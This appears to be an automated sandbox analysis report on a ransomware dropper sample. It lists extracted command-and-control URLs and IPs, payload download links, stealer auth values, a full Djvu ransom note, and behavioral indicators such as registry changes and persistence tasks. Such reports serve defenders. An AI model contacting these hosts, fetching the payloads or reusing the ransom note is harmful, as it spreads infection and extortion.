djvu | 0931826deaf2d247bbd4bf0f9db8b9ec4b1b1830f5763155487afc8dec645c5d

Analysis

max time kernel
114s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
03-03-2022 14:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0931826deaf2d247bbd4bf0f9db8b9ec4b1b1830f5763155487afc8dec645c5d.exe
Size

3.6MB
MD5

27b8f48c5402875ce3d4e2cbe912be72
SHA1

4259e9f43ba3de082f72d1c5049702cf3a250353
SHA256

0931826deaf2d247bbd4bf0f9db8b9ec4b1b1830f5763155487afc8dec645c5d
SHA512

7593691dadb061fc79f1e5ecdecd9a26d86e13fa5dd64faf0778b63b9083a755a22e5145cc0ff95eac5f32f1e9d20bae09a05299beca06a2173677e98e655d4b

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

vidar

Version

39.9

Botnet

706

https://prophefliloc.tumblr.com/

Attributes

profile_id
706

Extracted

Family

redline

Botnet

ANINEWONE

zisiarenal.xyz:80

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

redline

45.132.1.57:15771

Attributes

auth_value
9d006a439ab657f87bacd7a8c5f366b6

Extracted

Family

redline

Botnet

MIX2

45.132.1.57:15771

Attributes

auth_value
f5efeb0fa57eb56935fd3ba6d5750a9d

Extracted

Family

redline

Botnet

bild

95.216.21.217:19597

Attributes

auth_value
6a86304a315cc6a978ccb33feb915de5

Extracted

Family

redline

Botnet

fullwork1488

91.243.32.165:41754

Attributes

auth_value
a4384deb7b09a3c1c21c6447924c2d9a

Extracted

Family

vidar

Version

50.4

Botnet

937

https://mastodon.online/@samsa11

https://koyu.space/@samsa2l

Attributes

profile_id
937

Extracted

Family

redline

Botnet

333333

31.210.20.42:13040

Attributes

auth_value
3efa022bc816f747304fd68e5810bb78

Extracted

Family

redline

Botnet

joka

wamerlbyano.xyz:80

Attributes

auth_value
96ef84b6d2f17b052fdd02c3f63e1e40

Extracted

Family

redline

Botnet

ruzki (check bio)

103.133.111.182:44839

Attributes

auth_value
767fa45398d3ac4a23de20d0480c2b03

Extracted

Family

djvu

http://fuyt.org/test3/get.php

Attributes

extension
.qbaa
offline_id
rpx4UUTYZiAR5omq187UvM233jloVHyJUkA8s3t1
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-G76puQlxBn Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: helprestoremanager@airmail.cc Your personal ID: 0412Jsfkjn

rsa_pubkey.plain

Signatures

Detected Djvu ransomware 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3940-303-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4740-297-0x0000000002470000-0x000000000258B000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3760 4304 rundll32.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3760	4304	rundll32.exe

RedLine Payload 26 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3712-216-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral2/memory/4376-245-0x0000000000B20000-0x0000000000CBE000-memory.dmp	family_redline
behavioral2/memory/4376-247-0x0000000000B20000-0x0000000000CBE000-memory.dmp	family_redline
behavioral2/memory/4440-261-0x0000000000E30000-0x0000000000F6A000-memory.dmp	family_redline
behavioral2/memory/4376-258-0x0000000000B22000-0x0000000000B3B000-memory.dmp	family_redline
behavioral2/memory/2208-249-0x00000000008A0000-0x0000000000A05000-memory.dmp	family_redline
behavioral2/memory/2208-262-0x00000000008A2000-0x00000000008BB000-memory.dmp	family_redline
behavioral2/memory/2208-246-0x00000000008A0000-0x0000000000A05000-memory.dmp	family_redline
behavioral2/memory/2208-270-0x00000000008A0000-0x0000000000A05000-memory.dmp	family_redline
behavioral2/memory/4440-284-0x0000000000E32000-0x0000000000E4B000-memory.dmp	family_redline
behavioral2/memory/4440-291-0x0000000000E30000-0x0000000000F6A000-memory.dmp	family_redline
behavioral2/memory/2908-289-0x0000000000080000-0x00000000001BA000-memory.dmp	family_redline
behavioral2/memory/4440-287-0x0000000000E30000-0x0000000000F6A000-memory.dmp	family_redline
behavioral2/memory/1680-275-0x0000000000820000-0x000000000095A000-memory.dmp	family_redline
behavioral2/memory/2208-274-0x00000000008A0000-0x0000000000A05000-memory.dmp	family_redline
behavioral2/memory/4376-273-0x0000000000B20000-0x0000000000CBE000-memory.dmp	family_redline
behavioral2/memory/4392-277-0x0000000000E30000-0x0000000000F6A000-memory.dmp	family_redline
behavioral2/memory/4376-268-0x0000000000B20000-0x0000000000CBE000-memory.dmp	family_redline
behavioral2/memory/2908-271-0x0000000000080000-0x00000000001BA000-memory.dmp	family_redline
behavioral2/memory/4440-266-0x0000000000E30000-0x0000000000F6A000-memory.dmp	family_redline
behavioral2/memory/1680-295-0x0000000000820000-0x000000000095A000-memory.dmp	family_redline
behavioral2/memory/1680-298-0x0000000000822000-0x000000000083B000-memory.dmp	family_redline
behavioral2/memory/2908-301-0x0000000000082000-0x000000000009B000-memory.dmp	family_redline
behavioral2/memory/4392-305-0x0000000000E30000-0x0000000000F6A000-memory.dmp	family_redline
behavioral2/memory/4592-342-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/4392-292-0x0000000000E30000-0x0000000000F6A000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\zaiqa_8.txt	family_socelars
C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\zaiqa_8.exe	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata
suricata: ET MALWARE MSIL/TrojanDownloader.Agent.JVN CnC Checkin
suricata: ET MALWARE MSIL/TrojanDownloader.Agent.JVN CnC Checkin
suricata
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata

Vidar Stealer 4 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/912-211-0x0000000004960000-0x00000000049FD000-memory.dmp	family_vidar
behavioral2/memory/912-212-0x0000000000400000-0x00000000004A1000-memory.dmp	family_vidar
behavioral2/memory/1704-290-0x0000000002370000-0x000000000241C000-memory.dmp	family_vidar
behavioral2/memory/1704-272-0x0000000000400000-0x00000000004B0000-memory.dmp	family_vidar

ASPack v2.12-2.42 9 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\libstdc++-6.dll	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 49 IoCs

Processes:

setup_installer.exesetup_install.exezaiqa_1.exezaiqa_5.exezaiqa_3.exezaiqa_6.exezaiqa_9.exezaiqa_4.exezaiqa_2.exezaiqa_8.exezaiqa_7.exezaiqa_5.tmpjfiag3g_gg.exejfiag3g_gg.exezaiqa_1.exejfiag3g_gg.exejfiag3g_gg.exezaiqa_4.exejfiag3g_gg.exejfiag3g_gg.exejfiag3g_gg.exejfiag3g_gg.exe7sYUpdEKGUAsMvYnpTXFqI06.exehjKtg0zdS5PhRksOaEqR437o.exe_fwutII_YYUyxpgW7o_1oTXj.exeIoEo9tlbmwL9_uosKPhFtaEd.exeConhost.exeq9Z7_r4VGCHdXuLHDsjm3jy_.exevSN2ugPYT9UR4uUD5p7CwSVG.exeu7XCUQfhF6ry7vSLBhdxlKPU.exebwL6VKSUPxs79qzWTSHE00UC.exeT_dF5UUChNw18TLzQ8V1CkmY.exeZWUGh5XgBT4go7y2rPM_rMd2.exeTjGft6wpxSRlstWc9hNXSyJl.exehRc97NYZkL2d3CprSj1JTt97.exewGgG4BU2_Nenvn5tICBQ8slO.exe5n_S0ceKtKwCcfNjvftO8qxt.exeNMY9oES3WTvv7_effYSe5tbF.exeYLRDH7egV473HdojfQ2CVFjP.exeTllsj2pLCMJh2BTg8xFub0k5.exefJivHOGcsKZXMrePOZWdOwZW.exeEbaNDXh5_v7Z9E5QL9QF6hGs.exe9SxC2yE4Jjctffann1DNkldC.exeforfiles.exeq8yXuo1vQhktKl6CRa9qYgZj.exeYsg0Qxyhae5cu2QWZIgjdBpM.exeTjGft6wpxSRlstWc9hNXSyJl.tmpI443nt2mtABQDVlDL7VwMRIa.exeConhost.exe

pid	process
3444	setup_installer.exe
3036	setup_install.exe
4780	zaiqa_1.exe
4876	zaiqa_5.exe
912	zaiqa_3.exe
1280	zaiqa_6.exe
2468	zaiqa_9.exe
1292	zaiqa_4.exe
1556	zaiqa_2.exe
3068	zaiqa_8.exe
1768	zaiqa_7.exe
2300	zaiqa_5.tmp
3796	jfiag3g_gg.exe
4384	jfiag3g_gg.exe
5024	zaiqa_1.exe
1840	jfiag3g_gg.exe
1920	jfiag3g_gg.exe
3712	zaiqa_4.exe
3964	jfiag3g_gg.exe
2640	jfiag3g_gg.exe
2012	jfiag3g_gg.exe
3332	jfiag3g_gg.exe
1568	7sYUpdEKGUAsMvYnpTXFqI06.exe
1440	hjKtg0zdS5PhRksOaEqR437o.exe
2264	_fwutII_YYUyxpgW7o_1oTXj.exe
2208	IoEo9tlbmwL9_uosKPhFtaEd.exe
4376	Conhost.exe
3760	q9Z7_r4VGCHdXuLHDsjm3jy_.exe
856	vSN2ugPYT9UR4uUD5p7CwSVG.exe
1704	u7XCUQfhF6ry7vSLBhdxlKPU.exe
3864	bwL6VKSUPxs79qzWTSHE00UC.exe
4440	T_dF5UUChNw18TLzQ8V1CkmY.exe
2124	ZWUGh5XgBT4go7y2rPM_rMd2.exe
1348	TjGft6wpxSRlstWc9hNXSyJl.exe
2464	hRc97NYZkL2d3CprSj1JTt97.exe
2152	wGgG4BU2_Nenvn5tICBQ8slO.exe
4208	5n_S0ceKtKwCcfNjvftO8qxt.exe
1964	NMY9oES3WTvv7_effYSe5tbF.exe
3964	YLRDH7egV473HdojfQ2CVFjP.exe
2908	Tllsj2pLCMJh2BTg8xFub0k5.exe
4740	fJivHOGcsKZXMrePOZWdOwZW.exe
4392	EbaNDXh5_v7Z9E5QL9QF6hGs.exe
816	9SxC2yE4Jjctffann1DNkldC.exe
4736	forfiles.exe
1680	q8yXuo1vQhktKl6CRa9qYgZj.exe
3432	Ysg0Qxyhae5cu2QWZIgjdBpM.exe
3068	TjGft6wpxSRlstWc9hNXSyJl.tmp
4428	I443nt2mtABQDVlDL7VwMRIa.exe
260	Conhost.exe

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

zaiqa_1.exezaiqa_7.exe0931826deaf2d247bbd4bf0f9db8b9ec4b1b1830f5763155487afc8dec645c5d.exesetup_installer.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	zaiqa_1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	zaiqa_7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	0931826deaf2d247bbd4bf0f9db8b9ec4b1b1830f5763155487afc8dec645c5d.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	setup_installer.exe

Loads dropped DLL 10 IoCs

Processes:

setup_install.exezaiqa_5.tmpTjGft6wpxSRlstWc9hNXSyJl.tmp

pid	process
3036	setup_install.exe
3036	setup_install.exe
3036	setup_install.exe
3036	setup_install.exe
3036	setup_install.exe
3036	setup_install.exe
3036	setup_install.exe
3036	setup_install.exe
2300	zaiqa_5.tmp
3068	TjGft6wpxSRlstWc9hNXSyJl.tmp

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

5964 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

11 ipinfo.io
215 ipinfo.io
246 api.2ip.ua
271 ipinfo.io
12 ipinfo.io
17 ip-api.com
216 ipinfo.io
248 api.2ip.ua
328 api.2ip.ua
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

pid	process
5964	icacls.exe

flow	ioc
11	ipinfo.io
215	ipinfo.io
246	api.2ip.ua
271	ipinfo.io
12	ipinfo.io
17	ip-api.com
216	ipinfo.io
248	api.2ip.ua
328	api.2ip.ua

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

Processes:

IoEo9tlbmwL9_uosKPhFtaEd.exeConhost.exeT_dF5UUChNw18TLzQ8V1CkmY.exeEbaNDXh5_v7Z9E5QL9QF6hGs.exeTllsj2pLCMJh2BTg8xFub0k5.exeq8yXuo1vQhktKl6CRa9qYgZj.exe

pid	process
2208	IoEo9tlbmwL9_uosKPhFtaEd.exe
4376	Conhost.exe
4440	T_dF5UUChNw18TLzQ8V1CkmY.exe
4392	EbaNDXh5_v7Z9E5QL9QF6hGs.exe
2908	Tllsj2pLCMJh2BTg8xFub0k5.exe
1680	q8yXuo1vQhktKl6CRa9qYgZj.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

zaiqa_4.exefJivHOGcsKZXMrePOZWdOwZW.exe

description	pid	process	target process
PID 1292 set thread context of 3712	1292	zaiqa_4.exe	zaiqa_4.exe
PID 4740 set thread context of 3940	4740	fJivHOGcsKZXMrePOZWdOwZW.exe	fJivHOGcsKZXMrePOZWdOwZW.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 23 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5308	3864	WerFault.exe	bwL6VKSUPxs79qzWTSHE00UC.exe
5360	3760	WerFault.exe	q9Z7_r4VGCHdXuLHDsjm3jy_.exe
5348	3760	WerFault.exe	q9Z7_r4VGCHdXuLHDsjm3jy_.exe
5296	816	WerFault.exe	9SxC2yE4Jjctffann1DNkldC.exe
5768	1964	WerFault.exe	NMY9oES3WTvv7_effYSe5tbF.exe
5480	2124	WerFault.exe	ZWUGh5XgBT4go7y2rPM_rMd2.exe
5692	4736	WerFault.exe	zBrevb3opsBNYUlKYAKGlQSv.exe
5308	2124	WerFault.exe	ZWUGh5XgBT4go7y2rPM_rMd2.exe
5732	2124	WerFault.exe	ZWUGh5XgBT4go7y2rPM_rMd2.exe
4896	2124	WerFault.exe	ZWUGh5XgBT4go7y2rPM_rMd2.exe
400	2124	WerFault.exe	ZWUGh5XgBT4go7y2rPM_rMd2.exe
3168	1440	WerFault.exe	hjKtg0zdS5PhRksOaEqR437o.exe
6004	5940	WerFault.exe	c5QNrV4VcM_iWw2hTIa6xd4l.exe
2344	5940	WerFault.exe	c5QNrV4VcM_iWw2hTIa6xd4l.exe
5944	5940	WerFault.exe	c5QNrV4VcM_iWw2hTIa6xd4l.exe
3632	4904	WerFault.exe	MK45EFA3AQTShYB245mYNJZ1.exe
5256	816	WerFault.exe	9SxC2yE4Jjctffann1DNkldC.exe
2420	5940	WerFault.exe	c5QNrV4VcM_iWw2hTIa6xd4l.exe
5360	4904	WerFault.exe	MK45EFA3AQTShYB245mYNJZ1.exe
2148	816	WerFault.exe	9SxC2yE4Jjctffann1DNkldC.exe
2852	5940	WerFault.exe	c5QNrV4VcM_iWw2hTIa6xd4l.exe
1812	5808	WerFault.exe	rundll32.exe
2908	4904	WerFault.exe	MK45EFA3AQTShYB245mYNJZ1.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

zaiqa_2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	zaiqa_2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	zaiqa_2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	zaiqa_2.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

5732 schtasks.exe
5852 schtasks.exe
6136 schtasks.exe
4052 schtasks.exe
6020 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

5528 timeout.exe
4956 timeout.exe
Kills process with taskkill 6 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4828 taskkill.exe
6036 taskkill.exe
2388 taskkill.exe
6076 taskkill.exe
3116 taskkill.exe
4976 taskkill.exe

pid	process
5732	schtasks.exe
5852	schtasks.exe
6136	schtasks.exe
4052	schtasks.exe
6020	schtasks.exe

pid	process
5528	timeout.exe
4956	timeout.exe

pid	process
4828	taskkill.exe
6036	taskkill.exe
2388	taskkill.exe
6076	taskkill.exe
3116	taskkill.exe
4976	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

zaiqa_3.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	zaiqa_3.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	zaiqa_3.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

zaiqa_2.exe

pid	process
1556	zaiqa_2.exe
1556	zaiqa_2.exe
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

zaiqa_2.exe

pid process

1556 zaiqa_2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

zaiqa_8.exezaiqa_6.exetaskkill.exezaiqa_4.exevSN2ugPYT9UR4uUD5p7CwSVG.exe

description	pid	process
Token: SeCreateTokenPrivilege	3068	zaiqa_8.exe
Token: SeAssignPrimaryTokenPrivilege	3068	zaiqa_8.exe
Token: SeLockMemoryPrivilege	3068	zaiqa_8.exe
Token: SeIncreaseQuotaPrivilege	3068	zaiqa_8.exe
Token: SeMachineAccountPrivilege	3068	zaiqa_8.exe
Token: SeTcbPrivilege	3068	zaiqa_8.exe
Token: SeSecurityPrivilege	3068	zaiqa_8.exe
Token: SeTakeOwnershipPrivilege	3068	zaiqa_8.exe
Token: SeLoadDriverPrivilege	3068	zaiqa_8.exe
Token: SeSystemProfilePrivilege	3068	zaiqa_8.exe
Token: SeSystemtimePrivilege	3068	zaiqa_8.exe
Token: SeProfSingleProcessPrivilege	3068	zaiqa_8.exe
Token: SeIncBasePriorityPrivilege	3068	zaiqa_8.exe
Token: SeCreatePagefilePrivilege	3068	zaiqa_8.exe
Token: SeCreatePermanentPrivilege	3068	zaiqa_8.exe
Token: SeBackupPrivilege	3068	zaiqa_8.exe
Token: SeRestorePrivilege	3068	zaiqa_8.exe
Token: SeShutdownPrivilege	3068	zaiqa_8.exe
Token: SeDebugPrivilege	3068	zaiqa_8.exe
Token: SeAuditPrivilege	3068	zaiqa_8.exe
Token: SeSystemEnvironmentPrivilege	3068	zaiqa_8.exe
Token: SeChangeNotifyPrivilege	3068	zaiqa_8.exe
Token: SeRemoteShutdownPrivilege	3068	zaiqa_8.exe
Token: SeUndockPrivilege	3068	zaiqa_8.exe
Token: SeSyncAgentPrivilege	3068	zaiqa_8.exe
Token: SeEnableDelegationPrivilege	3068	zaiqa_8.exe
Token: SeManageVolumePrivilege	3068	zaiqa_8.exe
Token: SeImpersonatePrivilege	3068	zaiqa_8.exe
Token: SeCreateGlobalPrivilege	3068	zaiqa_8.exe
Token: 31	3068	zaiqa_8.exe
Token: 32	3068	zaiqa_8.exe
Token: 33	3068	zaiqa_8.exe
Token: 34	3068	zaiqa_8.exe
Token: 35	3068	zaiqa_8.exe
Token: SeDebugPrivilege	1280	zaiqa_6.exe
Token: SeDebugPrivilege	3116	taskkill.exe
Token: SeDebugPrivilege	3712	zaiqa_4.exe
Token: SeShutdownPrivilege	3028
Token: SeCreatePagefilePrivilege	3028
Token: SeShutdownPrivilege	3028
Token: SeCreatePagefilePrivilege	3028
Token: SeShutdownPrivilege	3028
Token: SeCreatePagefilePrivilege	3028
Token: SeShutdownPrivilege	3028
Token: SeCreatePagefilePrivilege	3028
Token: SeCreateTokenPrivilege	856	vSN2ugPYT9UR4uUD5p7CwSVG.exe
Token: SeAssignPrimaryTokenPrivilege	856	vSN2ugPYT9UR4uUD5p7CwSVG.exe
Token: SeLockMemoryPrivilege	856	vSN2ugPYT9UR4uUD5p7CwSVG.exe
Token: SeIncreaseQuotaPrivilege	856	vSN2ugPYT9UR4uUD5p7CwSVG.exe
Token: SeMachineAccountPrivilege	856	vSN2ugPYT9UR4uUD5p7CwSVG.exe
Token: SeTcbPrivilege	856	vSN2ugPYT9UR4uUD5p7CwSVG.exe
Token: SeSecurityPrivilege	856	vSN2ugPYT9UR4uUD5p7CwSVG.exe
Token: SeTakeOwnershipPrivilege	856	vSN2ugPYT9UR4uUD5p7CwSVG.exe
Token: SeLoadDriverPrivilege	856	vSN2ugPYT9UR4uUD5p7CwSVG.exe
Token: SeSystemProfilePrivilege	856	vSN2ugPYT9UR4uUD5p7CwSVG.exe
Token: SeSystemtimePrivilege	856	vSN2ugPYT9UR4uUD5p7CwSVG.exe
